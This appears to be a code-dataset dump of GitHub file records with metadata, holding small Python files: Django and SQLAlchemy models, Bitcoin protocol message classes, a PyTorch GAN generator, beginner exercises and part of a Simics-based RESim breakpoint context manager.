blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4b5c57a1a97e7bd1e2d6a0e5181c1f4ccb65ba5a | 4188f3ad34f69e7b2689322a5992014ed9aeed22 | /csv_demo.py | cac442d489d0aaa68801ab4997638cfef1cc9a94 | [] | no_license | killertilapia/ds-coe-training-2019 | 283f1e08cca0e179c5e9caa7be4e73fdf447b4a0 | 119217e0754aef5bc1a18b522432901e8dd0963f | refs/heads/master | 2020-09-27T08:09:20.155985 | 2019-12-07T08:00:22 | 2019-12-07T08:00:22 | 226,471,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 701 | py | import os
import csv
# this is new
def main():
src_path = os.path.join(os.getcwd(), 'ds', 'ds_parts_inductors.csv')
write_path = os.path.join(os.getcwd(), 'ds', 'clean_parts.csv')
# read csv
with open(src_path, mode='r') as src_csv:
with open(write_path, mode='w', encoding='utf-8') as write_file:
reader = csv.reader(src_csv)
writer = csv.writer(write_file)
for idx, line in enumerate(reader):
if idx == 10:
break
print(" ".join(line))
# process line here
writer.writerows(line)
if __name__ == "__main__":
main() | [
"killer.tilapia@gmail.com"
] | killer.tilapia@gmail.com |
5eb21b17e0ce8d13350d66f54625e94bca759c7b | 9441e20e3f30b64f332436733c0f6bc9b3c876d6 | /lib/python2.7/site-packages/Mezzanine-3.0.4-py2.7.egg/mezzanine/__init__.py | c5e4c1a68515f712749a478e28939331d372378a | [] | no_license | zouluclara/cartridge | 83d1cb6a0ff46881422c7cbc5581d6f82865a5db | d82d463223fd412ac8b1e8c5ea3c53243d8d124e | refs/heads/master | 2021-01-16T18:00:55.091609 | 2014-02-26T14:25:54 | 2014-02-26T14:25:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23 | py |
__version__ = "3.0.4"
| [
"zouluclara@gmail.com"
] | zouluclara@gmail.com |
ac6b9fe528fd1ff5e26e7278bd4b3878b9d4d877 | f07d9d72721c24b4e79bd7847ddb0871c9d04023 | /source/webapp/admin.py | b6b4f28e4e9baffb1222239121dc0d90abd3cdc5 | [] | no_license | RagdIR/exam_end | 57f330c5b885b5dbf86bb9159302ceabf33530af | 06df2db37dc7ec7a04da0288fd6b4d11fcb6232b | refs/heads/main | 2023-02-18T22:52:15.604416 | 2021-01-23T14:42:48 | 2021-01-23T14:42:48 | 331,971,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | from django.contrib import admin
from webapp.models import Users, Friends, Message
admin.site.register(Users)
admin.site.register(Friends)
admin.site.register(Message) | [
"ragdirstrogov@gmail.com"
] | ragdirstrogov@gmail.com |
80927fd30b0c4980207e499565b91ff12d163eb7 | e5a74a239d2519882cda53c3f586832c22ab0f41 | /src/backend/app/main/model/book.py | 5d6fbcc3bd565bf63a5f1fefdc018a648e95de3e | [
"MIT"
] | permissive | lnquy/Sale-Manager-Project | b8c568088ab19884ae7bc385de002652a5c957fe | 5c4397d62d056caa24413284a2ae6c9052707e90 | refs/heads/develop | 2020-06-28T12:01:30.676450 | 2019-10-02T16:18:19 | 2019-10-02T16:18:19 | 200,229,132 | 0 | 0 | MIT | 2019-10-29T22:51:12 | 2019-08-02T12:15:11 | Vue | UTF-8 | Python | false | false | 1,292 | py | import datetime
from .. import db
from sqlalchemy.dialects import postgresql
class Book(db.Model):
""" Book model for storing user related details """
__tablename__ = "books"
id = db.Column(db.Integer, autoincrement=True, primary_key=True)
title = db.Column(db.String(500), nullable=False)
sub_title = db.Column(db.String(2000))
thumbnails = db.Column(postgresql.ARRAY(postgresql.CHAR))
description = db.Column(db.String(10000))
long_description = db.Column(db.String(50000))
price = db.Column(db.Numeric(), nullable=False)
total_rating_point = db.Column(db.Numeric())
total_rated = db.Column(db.Numeric())
total_purchased = db.Column(db.Numeric())
publisher = db.Column(db.String(500))
published_at = db.Column(db.DateTime())
published_place = db.Column(db.String(500))
pagination = db.Column(db.String(100))
ebook_formats = db.Column(db.JSON())
authors = db.Column(postgresql.ARRAY(postgresql.CHAR))
categories = db.Column(postgresql.ARRAY(postgresql.CHAR))
created_at = db.Column(db.DateTime())
updated_at = db.Column(db.DateTime())
is_deleted = db.Column(db.Boolean())
deleted_at = db.Column(db.DateTime())
def __repr__(self):
return "<Book #{}: {}>".format(self.id, self.title)
| [
"lnquy.it@gmail.com"
] | lnquy.it@gmail.com |
8c6a4092121b6afd50bfeb41fbe5f6e90c2a433f | ee70c449967f4c1f771da882e7f1b25091a34dc7 | /website/admin.py | 4d1046302bc7245b8e21f4484cec0905a71dea30 | [] | no_license | mayurdhurpate/shilp16 | 6fec78ef8dab62bb0dd288486e8c9bd72578349b | a0f17a4eac0cf5631ade5d2b7b4c3783e7f8a22d | refs/heads/master | 2021-03-19T13:44:17.959859 | 2016-10-03T12:08:19 | 2016-10-03T12:08:19 | 63,174,858 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | from django.contrib import admin
from .models import *
# Register your models here.
admin.site.register(CAUser)
admin.site.register(PPTUser)
admin.site.register(User)
admin.site.register(WorkUser)
admin.site.register(WorkdataUser)
admin.site.register(greUser)
| [
"kushagra.agrawal.civ14@itbhu.ac.in"
] | kushagra.agrawal.civ14@itbhu.ac.in |
52fac62da61576ec22dc52af49eaae937130bdfd | 9ec1242ae20b6f407f25a266456d83fb8a3d5f73 | /src/nellCoin/lib/messages.py | dd5b6fb432476e6c8530ccf6e7483d3a9b8685ad | [
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain",
"MIT"
] | permissive | Nell-MDCoin/Nell-MDCoin | 5b6d6af7e141844ba22970adacd4877d024e872b | 9a1be366aba13539132dc7d0a9f0fdeaa2e19044 | refs/heads/master | 2020-03-21T23:17:23.329553 | 2018-06-29T17:32:53 | 2018-06-29T17:32:53 | 139,177,535 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,907 | py | # messages.py
#
# Distributed under the MIT/X11 software license
from __future__ import absolute_import, division, print_function, unicode_literals
import struct
import time
import random
import cStringIO
from nellCoin.lib.coredefs import *
from nellCoin.lib.core import *
MSG_TX = 1
MSG_BLOCK = 2
class msg_version(object):
command = b"version"
def __init__(self, protover=PROTO_VERSION):
self.protover = MIN_PROTO_VERSION
self.nVersion = protover
self.nServices = 1
self.nTime = time.time()
self.addrTo = CAddress(MIN_PROTO_VERSION)
self.addrFrom = CAddress(MIN_PROTO_VERSION)
self.nNonce = random.getrandbits(64)
self.strSubVer = b'/python-bitcoin-0.0.1/'
self.nStartingHeight = -1
def deserialize(self, f):
self.nVersion = struct.unpack(b"<i", f.read(4))[0]
if self.nVersion == 10300:
self.nVersion = 300
self.nServices = struct.unpack(b"<Q", f.read(8))[0]
self.nTime = struct.unpack(b"<q", f.read(8))[0]
self.addrTo = CAddress(MIN_PROTO_VERSION)
self.addrTo.deserialize(f)
if self.nVersion >= 106:
self.addrFrom = CAddress(MIN_PROTO_VERSION)
self.addrFrom.deserialize(f)
self.nNonce = struct.unpack(b"<Q", f.read(8))[0]
self.strSubVer = deser_string(f)
if self.nVersion >= 209:
self.nStartingHeight = struct.unpack(b"<i", f.read(4))[0]
else:
self.nStartingHeight = None
else:
self.addrFrom = None
self.nNonce = None
self.strSubVer = None
self.nStartingHeight = None
def serialize(self):
r = b""
r += struct.pack(b"<i", self.nVersion)
r += struct.pack(b"<Q", self.nServices)
r += struct.pack(b"<q", self.nTime)
r += self.addrTo.serialize()
r += self.addrFrom.serialize()
r += struct.pack(b"<Q", self.nNonce)
r += ser_string(self.strSubVer)
r += struct.pack(b"<i", self.nStartingHeight)
return r
def __repr__(self):
return "msg_version(nVersion=%i nServices=%i nTime=%s addrTo=%s addrFrom=%s nNonce=0x%016X strSubVer=%s nStartingHeight=%i)" % (self.nVersion, self.nServices, time.ctime(self.nTime), repr(self.addrTo), repr(self.addrFrom), self.nNonce, self.strSubVer, self.nStartingHeight)
class msg_verack(object):
command = b"verack"
def __init__(self, protover=PROTO_VERSION):
self.protover = protover
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_verack()"
class msg_addr(object):
command = b"addr"
def __init__(self, protover=PROTO_VERSION):
self.protover = protover
self.addrs = []
def deserialize(self, f):
self.addrs = deser_vector(f, CAddress, self.protover)
def serialize(self):
return ser_vector(self.addrs)
def __repr__(self):
return "msg_addr(addrs=%s)" % (repr(self.addrs))
class msg_alert(object):
command = b"alert"
def __init__(self, protover=PROTO_VERSION):
self.protover = protover
self.alert = CAlert()
def deserialize(self, f):
self.alert = CAlert()
self.alert.deserialize(f)
def serialize(self):
r = b""
r += self.alert.serialize()
return r
def __repr__(self):
return "msg_alert(alert=%s)" % (repr(self.alert), )
class msg_inv(object):
command = b"inv"
def __init__(self, protover=PROTO_VERSION):
self.protover = protover
self.inv = []
def deserialize(self, f):
self.inv = deser_vector(f, CInv)
def serialize(self):
return ser_vector(self.inv)
def __repr__(self):
return "msg_inv(inv=%s)" % (repr(self.inv))
class msg_getdata(object):
command = b"getdata"
def __init__(self, protover=PROTO_VERSION):
self.protover = protover
self.inv = []
def deserialize(self, f):
self.inv = deser_vector(f, CInv)
def serialize(self):
return ser_vector(self.inv)
def __repr__(self):
return "msg_getdata(inv=%s)" % (repr(self.inv))
class msg_getblocks(object):
command = b"getblocks"
def __init__(self, protover=PROTO_VERSION):
self.protover = protover
self.locator = CBlockLocator()
self.hashstop = 0
def deserialize(self, f):
self.locator = CBlockLocator()
self.locator.deserialize(f)
self.hashstop = deser_uint256(f)
def serialize(self):
r = b""
r += self.locator.serialize()
r += ser_uint256(self.hashstop)
return r
def __repr__(self):
return "msg_getblocks(locator=%s hashstop=%064x)" % (repr(self.locator), self.hashstop)
class msg_getheaders(object):
command = b"getheaders"
def __init__(self, protover=PROTO_VERSION):
self.protover = protover
self.locator = CBlockLocator()
self.hashstop = 0
def deserialize(self, f):
self.locator = CBlockLocator()
self.locator.deserialize(f)
self.hashstop = deser_uint256(f)
def serialize(self):
r = b""
r += self.locator.serialize()
r += ser_uint256(self.hashstop)
return r
def __repr__(self):
return "msg_getheaders(locator=%s hashstop=%064x)" % (repr(self.locator), self.hashstop)
class msg_headers(object):
command = b"headers"
def __init__(self, protover=PROTO_VERSION):
self.protover = protover
self.headers = []
def deserialize(self, f):
self.headers = deser_vector(f, CBlock)
def serialize(self):
return ser_vector(self.headers)
def __repr__(self):
return "msg_headers(headers=%s)" % (repr(self.headers))
class msg_tx(object):
command = b"tx"
def __init__(self, protover=PROTO_VERSION):
self.protover = protover
self.tx = CTransaction()
def deserialize(self, f):
self.tx.deserialize(f)
def serialize(self):
return self.tx.serialize()
def __repr__(self):
return "msg_tx(tx=%s)" % (repr(self.tx))
class msg_block(object):
command = b"block"
def __init__(self, protover=PROTO_VERSION):
self.protover = protover
self.block = CBlock()
def deserialize(self, f):
self.block.deserialize(f)
def serialize(self):
return self.block.serialize()
def __repr__(self):
return "msg_block(block=%s)" % (repr(self.block))
class msg_getaddr(object):
command = b"getaddr"
def __init__(self, protover=PROTO_VERSION):
self.protover = protover
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_getaddr()"
#msg_checkorder
#msg_submitorder
#msg_reply
class msg_ping(object):
command = b"ping"
def __init__(self, protover=PROTO_VERSION, nonce=0):
self.protover = protover
self.nonce = nonce
def deserialize(self, f):
if self.protover > BIP0031_VERSION:
self.nonce = struct.unpack(b"<Q", f.read(8))[0]
def serialize(self):
r = b""
if self.protover > BIP0031_VERSION:
r += struct.pack(b"<Q", self.nonce)
return r
def __repr__(self):
return "msg_ping(0x%x)" % (self.nonce,)
class msg_pong(object):
command = b"pong"
def __init__(self, protover=PROTO_VERSION, nonce=0):
self.protover = protover
self.nonce = nonce
def deserialize(self, f):
self.nonce = struct.unpack(b"<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack(b"<Q", self.nonce)
return r
def __repr__(self):
return "msg_pong(0x%x)" % (self.nonce,)
class msg_mempool(object):
command = b"mempool"
def __init__(self, protover=PROTO_VERSION):
self.protover = protover
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_mempool()"
messagemap = {
"version": msg_version,
"verack": msg_verack,
"addr": msg_addr,
"alert": msg_alert,
"inv": msg_inv,
"getdata": msg_getdata,
"getblocks": msg_getblocks,
"tx": msg_tx,
"block": msg_block,
"getaddr": msg_getaddr,
"ping": msg_ping,
"pong": msg_pong,
"mempool": msg_mempool
}
def message_read(netmagic, f):
try:
recvbuf = f.read(4 + 12 + 4 + 4)
except IOError:
return None
# check magic
if len(recvbuf) < 4:
return
if recvbuf[:4] != netmagic.msg_start:
raise ValueError("got garbage %s" % repr(recvbuf))
# check checksum
if len(recvbuf) < 4 + 12 + 4 + 4:
return
# remaining header fields: command, msg length, checksum
command = recvbuf[4:4+12].split(b"\x00", 1)[0]
msglen = struct.unpack(b"<i", recvbuf[4+12:4+12+4])[0]
checksum = recvbuf[4+12+4:4+12+4+4]
# read message body
try:
recvbuf += f.read(msglen)
except IOError:
return None
msg = recvbuf[4+12+4+4:4+12+4+4+msglen]
th = hashlib.sha256(msg).digest()
h = hashlib.sha256(th).digest()
if checksum != h[:4]:
raise ValueError("got bad checksum %s" % repr(recvbuf))
recvbuf = recvbuf[4+12+4+4+msglen:]
if command in messagemap:
f = cStringIO.StringIO(msg)
t = messagemap[command]()
t.deserialize(f)
return t
else:
return None
def message_to_str(netmagic, message):
command = message.command
data = message.serialize()
tmsg = netmagic.msg_start
tmsg += command
tmsg += b"\x00" * (12 - len(command))
tmsg += struct.pack(b"<I", len(data))
# add checksum
th = hashlib.sha256(data).digest()
h = hashlib.sha256(th).digest()
tmsg += h[:4]
tmsg += data
return tmsg
| [
"justdvnsh2208@gmail.com"
] | justdvnsh2208@gmail.com |
29418615cd3956b442698533f8144fa90d951f17 | e17a6d897da03d11b0924223c37f92dd841390da | /Python/setoperations.py | ef20ea7b79a2252a9e86bb9e2b8717eefd64838a | [] | no_license | PrudhviRaju1999/Training-npci-iiht | 746c7eb46f5d42d7371e99b4d75b822b33452ac1 | ce42b260ee92a02871c9b5b27cf0dbeb1359d99b | refs/heads/master | 2023-08-08T03:55:10.698492 | 2021-09-29T05:33:22 | 2021-09-29T05:33:22 | 406,335,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 559 | py | ls_set={1,7,3,9,22}
print(ls_set)
print(sorted(ls_set,reverse=True))
nw=[]
ls_list=list(ls_set)
while ls_list:
max = ls_list[0]
for x in ls_list:
if x > max:
max = x
nw.append(max)
ls_list.remove(max)
print(nw)
#asssignment 2
s1="mad"
s2="bam"
s3="adm"
if sorted(s1)==sorted(s2):
if sorted(s1)==sorted(s3):
print("Yes 3 strings are anagrams")
else:
print("Not anagramas")
#Assignment 3
list_ls=[1,2,3,4,7,8,9]
for i in range(list_ls[0],list_ls[-1]+1):
if i not in list_ls:
print(i)
| [
"90675358+PrudhviRaju1999@users.noreply.github.com"
] | 90675358+PrudhviRaju1999@users.noreply.github.com |
8e7580b71b90f48eb3da61675ce8b7001d524259 | 1f7ae75815f16fc64dcd15a62da8091c87d697ee | /ch2/KthLast.py | a0381b285cefc19b1fcc031ea8ce81c1ac635960 | [] | no_license | danilolau/cracking_coding_interview_py | 4cee0571fd4ba6f6767da6f4af99fe0e41b27912 | 450f00a6f2cfb826b24cbd2242187b892eee9e32 | refs/heads/main | 2023-06-04T11:36:10.302976 | 2021-07-01T19:03:21 | 2021-07-01T19:03:21 | 360,946,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | from structs.linkedlist import Node, LinkedList
def kth_last(k,ll):
pointer = ll.head
kth = ll.head
for _ in range(k):
try:
pointer = pointer.next
except:
break
while pointer!=ll.tail:
pointer = pointer.next
kth = kth.next
return kth
ll = LinkedList(Node(1))
items = [2,3,4,5,6,5,3,2,3,5,4,3,2,6,7,8,10,1]
ll.append_list_to_tail(items)
print(ll)
print(kth_last(0,ll))
| [
"daniloaraujo@Danilos-MacBook-Pro.local"
] | daniloaraujo@Danilos-MacBook-Pro.local |
9252a85cc583668635a22b48dfa5f1af859fcd61 | d2e76cf29eff1e3a09790828e2cb3070aef53e6d | /CareHub/Profile/migrations/0004_auto_20190215_1717.py | e83314d086a9c618f220aa04724b414a8425d1d0 | [] | no_license | ganzourii/SE2018G10 | 2774e0dde00ba0d8ea990ac3db26fd8c0b744ca5 | 22d314494bca84550a4cbbdcc7dbf713491588ed | refs/heads/master | 2020-03-30T19:26:31.679332 | 2019-02-17T08:48:34 | 2019-02-17T08:48:34 | 151,542,753 | 0 | 7 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | # Generated by Django 2.1.2 on 2019-02-15 15:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Profile', '0003_auto_20190215_1711'),
]
operations = [
migrations.AlterField(
model_name='patient',
name='image',
field=models.ImageField(default='static/patient_profile_pics/defaultPatient.jpg', upload_to=' patient_profile_pics'),
),
]
| [
"36420865+mr-rofl@users.noreply.github.com"
] | 36420865+mr-rofl@users.noreply.github.com |
0be50c038d2051c58ca35de90c9f30e0b014333a | fbf7f71ded0da35144e7890372fb966ceb24aa35 | /generator/__init__.py | 6c3ce4bfb0ab575c2528b6449413e4c3e3524d98 | [
"MIT"
] | permissive | shivamswarnkar/Image-Generator | 93477864db0a8b2cd50d717b6dfe450a365249d8 | 55b6d066c84c615403e48c27e77ee017cf260955 | refs/heads/master | 2021-07-15T20:47:23.379504 | 2021-07-10T07:54:23 | 2021-07-10T07:54:23 | 218,314,417 | 15 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | import torch.nn as nn
# Generator Network
class Generator(nn.Module):
def __init__(self, args):
super(Generator, self).__init__()
self.ngpu = args.ngpu
self.main = nn.Sequential(
# input Z; First
nn.ConvTranspose2d(args.nz, args.ngf * 8, 4, 1, 0, bias=False),
nn.BatchNorm2d(args.ngf * 8),
nn.ReLU(True),
#second
nn.ConvTranspose2d(args.ngf * 8, args.ngf * 4, 4, 2, 1, bias=False),
nn.BatchNorm2d(args.ngf*4),
nn.ReLU(True),
#third
nn.ConvTranspose2d(args.ngf*4, args.ngf*2, 4, 2, 1, bias=False),
nn.BatchNorm2d(args.ngf*2),
nn.ReLU(True),
# fourth
nn.ConvTranspose2d(args.ngf * 2, args.ngf, 4, 2, 1, bias=False),
nn.BatchNorm2d(args.ngf),
nn.ReLU(True),
# output nc * 64 * 64
nn.ConvTranspose2d(args.ngf, args.nc, 4, 2, 1, bias=False),
nn.Tanh()
)
def forward(self, input):
return self.main(input) | [
"ss8464@nyu.edu"
] | ss8464@nyu.edu |
9d9c1305ed57e2a327da571c32f06702b2a1fc11 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /Akx92Ldcy78xp5zCF_4.py | 9d5e1d493ab24f7c6508ffe8f4080fda61583184 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 669 | py | """
The function is given two strings `t` \- template, `s` \- to be sorted. Sort
the characters in `s` such that if the character is present in `t` then it is
sorted according to the order in `t` and other characters are sorted
alphabetically after the ones found in `t`.
### Examples
custom_sort("edc", "abcdefzyx") ➞ "edcabfxyz"
custom_sort("fby", "abcdefzyx") ➞ "fbyacdexz"
custom_sort("", "abcdefzyx") ➞ "abcdefxyz"
custom_sort("", "") ➞ ""
### Notes
The characters in `t` and `s` are all lower-case.
"""
def custom_sort(t, s):
return ''.join(sorted(list(s), key=lambda x: t.index(x) if x in t else ord(x) ))
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
bcf4526e435d550484e29273775b5f583c8ac4a2 | d60d72fb2a43fe64382f00d4c99d9481e281a1bc | /Scripts RNA Adaline/TratamentoDadosIMDB.py | 81b5a0cf0ddb08d6e3c9610d8ae1646de482e674 | [] | no_license | MarcoAntonioGomes/Trabalho-de-IA---Classifica-o-de-Coment-rios-do-IMDB | 94c0cf2c5830c253d88cbfd9f44170ebe125a086 | 2a0e095e1647852af57c5ea19d10162db6c4226e | refs/heads/master | 2021-09-01T07:24:20.902673 | 2017-12-25T16:48:03 | 2017-12-25T16:48:03 | 115,351,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,220 | py |
"""
Created on Sun Dec 3 13:10:22 2017
@author: Marco
"""
from sklearn.datasets import*
from sklearn.feature_extraction.text import *
categorias = [ 'Negativo' , 'Positivo']
dados = load_files("C:\\Users\\Marco\\Desktop\\6º Periodo\\Inteligencia Artificial\\ComentariosIMDB", description = None , categories = categorias , load_content = True , shuffle = True , decode_error = 'strict' , random_state = 0 )
indiceNegativos = list()
for i in range (len(dados.target)):
if dados.target[i] == 0:
indiceNegativos.append(i)
count_vect = CountVectorizer() # Cria a Sacola de Palavras
dados_counts = count_vect.fit_transform(dados.data) #
#print(dados_counts)
#print(count_vect.vocabulary_.get('great'))
tf_transformer = TfidfTransformer(use_idf = False).fit(dados_counts)
dados_tf = tf_transformer.transform(dados_counts)
tfidf_transformer = TfidfTransformer()
dados_tfidf = tfidf_transformer.fit_transform(dados_counts)
print(dados_tfidf)
print("-----------------------------------------------------------------------------------------------")
#print(dados_tf)
feature_names = count_vect.get_feature_names()
#print(len(feature_names))
#print(feature_names)
#print(feature_names[73821])
| [
"marcoantonio.gomes@yahoo.com.br"
] | marcoantonio.gomes@yahoo.com.br |
a6388fd226aa360a3e348f2f9468dcad02a7a36f | f4e57645e92b594dcf611336b774f9febcd09923 | /simics/monitorCore/genContextMgr.py | 7d63179158f92977c44f66d185ba05a758005c85 | [] | no_license | kingking888/RESim | 24dc63f23df59c66a4aa455cef25a71ecbf2958a | cb3ea4536df5f93719894db83fbfbe42eb25309a | refs/heads/master | 2023-03-21T00:11:12.327617 | 2021-03-19T22:37:32 | 2021-03-19T22:37:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45,525 | py | from simics import *
'''
Track task context and set/remove beakpoints & haps accordingly. Currently recognises two contexts:
default & RESim. Also has a carve-out for "maze_exit" breakpoints/haps, managed as an attribute of
the hap. Designed to watch a single thread group.
There is one instance of this module per cell.
'''
class GenBreakpoint():
def __init__(self, cell, addr_type, mode, addr, length, flags, handle, lgr, prefix=None):
self.cell = cell
self.addr_type = addr_type
self.mode = mode
self.addr = addr
self.length = length
self.flags = flags
self.break_num = None
self.lgr = lgr
self.handle = handle
self.prefix = prefix
self.set()
def show(self):
print('\tbreak_handle: %s num: %s add:0x%x' % (str(self.handle), str(self.break_num), self.addr))
def set(self):
#self.break_num = SIM_breakpoint(self.cell, self.addr_type, self.mode, self.addr, self.length, self.flags)
''' do set in hap? '''
pass
#self.lgr.debug('GenBreakpoint set done in hap, the break handle is %d' % self.handle)
def clear(self):
if self.break_num is not None:
#self.lgr.debug('GenBreakpoint clear breakpoint %d break handle is %d' % (self.break_num, self.handle))
SIM_delete_breakpoint(self.break_num)
self.break_num = None
class GenHap():
def __init__(self, hap_type, callback, parameter, handle, lgr, breakpoint_list, name, immediate=True):
''' breakpoint_start and breakpont_end are GenBreakpoint types '''
self.hap_type = hap_type
self.callback = callback
''' used with afl '''
self.parameter = parameter
self.breakpoint_list = breakpoint_list
self.lgr = lgr
self.hap_num = None
self.handle = handle
self.name = name
self.set(immediate)
def show(self):
if self.handle is not None and self.hap_num is not None:
print('hap_handle: %d num: %d name: %s' % (self.handle, self.hap_num, self.name))
for bp in self.breakpoint_list:
bp.show()
def hapAlone(self, (bs, be)):
#self.lgr.debug('GenHap alone set hap_handle %s name: %s on range %s %s (0x%x 0x%x) break handles %s %s' % (str(self.handle),
# self.name, str(bs.break_num), str(be.break_num),
# bs.addr, be.addr, str(bs.handle), str(be.handle)))
self.hap_num = SIM_hap_add_callback_range(self.hap_type, self.callback, self.parameter, bs.break_num, be.break_num)
#self.lgr.debug('GenHap alone set hap_handle %s assigned hap %s name: %s on range %s %s (0x%x 0x%x) break handles %s %s' % (str(self.handle),
# str(self.hap_num), self.name, str(bs.break_num), str(be.break_num),
# bs.addr, be.addr, str(bs.handle), str(be.handle)))
def set(self, immediate=True):
''' NOTE: different calls to SIM_brekapoint below '''
if len(self.breakpoint_list) > 1:
for bp in self.breakpoint_list:
bp.break_num = SIM_breakpoint(bp.cell, bp.addr_type, bp.mode, bp.addr, bp.length, bp.flags)
if bp.prefix is not None:
command = 'set-prefix %d "%s"' % (bp.break_num, bp.prefix)
SIM_run_alone(SIM_run_command, command)
#self.lgr.debug('contextManager prefix cmd: %s' % command)
self.lgr.debug('GenHap breakpoint created for hap_handle %d assigned breakpoint num %d' % (self.handle, bp.break_num))
bs = self.breakpoint_list[0]
be = self.breakpoint_list[-1]
#self.lgr.debug('GenHap callback range')
if immediate:
#self.lgr.debug('GenHap set hap_handle %s assigned name: %s on range %s %s (0x%x 0x%x) break handles %s %s' % (str(self.handle),
# self.name, str(bs.break_num), str(be.break_num),
# bs.addr, be.addr, str(bs.handle), str(be.handle)))
self.hap_num = SIM_hap_add_callback_range(self.hap_type, self.callback, self.parameter, bs.break_num, be.break_num)
#self.lgr.debug('GenHap set hap_handle %s assigned hap %s name: %s on range %s %s (0x%x 0x%x) break handles %s %s' % (str(self.handle),
# str(self.hap_num), self.name, str(bs.break_num), str(be.break_num),
# bs.addr, be.addr, str(bs.handle), str(be.handle)))
else:
SIM_run_alone(self.hapAlone, (bs, be))
elif len(self.breakpoint_list) == 1:
bp = self.breakpoint_list[0]
#self.lgr.debug('bp.cell is %s addr %s' % (str(bp.cell), str(bp.addr)))
if bp.addr is None:
self.lgr.error('contextManager, set bp.addr is none')
return
bp.break_num = SIM_breakpoint(bp.cell, bp.addr_type, bp.mode, bp.addr, bp.length, bp.flags)
if bp.prefix is not None:
command = 'set-prefix %d "%s"' % (bp.break_num, bp.prefix)
SIM_run_alone(SIM_run_command, command)
#self.lgr.debug('contextManager prefix cmd: %s' % command)
#self.lgr.debug('GenHap set hap_handle %s name: %s on break %s (0x%x) break_handle %s' % (str(self.handle),
# self.name, str(bp.break_num), bp.addr, str(bp.handle)))
self.hap_num = SIM_hap_add_callback_index(self.hap_type, self.callback, self.parameter, bp.break_num)
#self.lgr.debug('GenHap set hap_handle %s assigned hap %s name: %s on break %s (0x%x) break_handle %s' % (str(self.handle), str(self.hap_num),
# self.name, str(bp.break_num), bp.addr, str(bp.handle)))
else:
self.lgr.error('GenHap, no breakpoints')
def clear(self, dumb=None):
if self.hap_num is not None:
for bp in self.breakpoint_list:
bp.clear()
SIM_hap_delete_callback_id(self.hap_type, self.hap_num)
#self.lgr.debug('GenHap clear hap %d handle %d' % (self.hap_num, self.handle))
self.hap_num = None
class GenContextMgr():
def __init__(self, top, cell_name, task_utils, param, cpu, lgr):
self.top = top
self.cell_name = cell_name
self.task_utils = task_utils
self.param = param
self.task_utils = task_utils
self.mem_utils = task_utils.getMemUtils()
self.debugging_pid = None
self.debugging_pid_saved = None
self.debugging_comm = None
self.debugging_cell = None
self.cpu = cpu
self.pageFaultGen = None
''' watch multiple tasks, e.g., threads '''
self.watch_rec_list = {}
self.watch_rec_list_saved = {}
self.pending_watch_pids = []
self.nowatch_list = []
self.watching_tasks = False
self.single_thread = False
self.lgr = lgr
self.ida_message = None
self.exit_break_num = None
self.exit_cb_num = None
self.phys_current_task = task_utils.getPhysCurrentTask()
self.task_break = None
self.task_hap = None
self.breakpoints = []
self.haps = []
self.break_handle = 0
self.hap_handle = 0
self.text_start = None
self.text_end = None
self.catch_pid = None
self.catch_callback = None
self.watch_only_this = False
''' used with afl '''
self.callback = None
self.exit_callback = None
''' experiment with tracking task switches among watched pids '''
self.task_switch = {}
obj = SIM_get_object(cell_name)
self.default_context = obj.cell_context
context = 'RESim_%s' % cell_name
cmd = 'new-context %s' % context
SIM_run_command(cmd)
obj = SIM_get_object(context)
self.resim_context = obj
self.lgr.debug('context_manager cell %s resim_context defined as obj %s' % (self.cell_name, str(obj)))
''' avoid searching all task recs to know if pid being watched '''
self.pid_cache = []
self.group_leader = None
''' watch pointers to task recs to catch kills '''
self.task_rec_hap = {}
self.task_rec_bp = {}
self.task_rec_watch = {}
''' avoid multiple calls to taskRecHap '''
self.demise_cache = []
''' used by pageFaultGen to supress breaking on apparent kills '''
self.watching_page_faults = False
def getRealBreak(self, break_handle):
for hap in self.haps:
for bp in hap.breakpoint_list:
if bp.handle == break_handle:
return bp.break_num
return None
def getBreakHandle(self, real_bp):
for hap in self.haps:
#self.lgr.debug('getBreakHandle hap %s' % (hap.name))
for bp in hap.breakpoint_list:
#self.lgr.debug('getBreakHandle look for %d got %d' % (real_bp, bp.break_num))
